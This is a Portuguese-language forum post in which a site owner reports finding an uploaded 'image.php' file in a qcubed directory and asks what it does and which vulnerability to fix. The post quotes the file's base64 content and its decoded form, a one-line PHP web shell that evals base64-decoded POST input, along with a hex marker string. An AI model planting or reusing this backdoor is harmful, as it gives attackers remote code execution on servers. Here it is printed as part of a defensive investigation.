Ok, então aqui está o que eu pesquisei:

Parece que há um arquivo carregado chamado "image.php" que é carregado em um diretório qcubed.

Esse arquivo image.php contém o seguinte código base64:

aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzMxMzkzNjJlMzIzMzMxMmQzMTM3MzIyZTMyMzgzYTY5NjY2MTYzNjU3MjZkNzA3NTYyNmQ2OTYzNjUzYTYxNjY2MTYzMzQzMjY1NzI2OTMwMzInOw==

decodificado acrescenta a isso:

if(isset($_POST['e']))

eval(base64_decode($_POST['e']));

echo '3139362e3233312d3137322e32383a6966616365726d7075626d6963653a6166616334326572693032';

Pesquisando a string de saída, encontrei vulnerabilidades semelhantes de qcubed em outros sites.

Decodificando a última string que recebi:

196.231-172.28:ifacermpubmice:afac42eri02

O que eu realmente não entendo o que ele faz (usando:http://ostermiller.org/calc/encode.html)

Você pode me explicar o que estou enfrentando em particular aqui? Que vulnerabilidade de segurança devo corrigir para corrigir isso?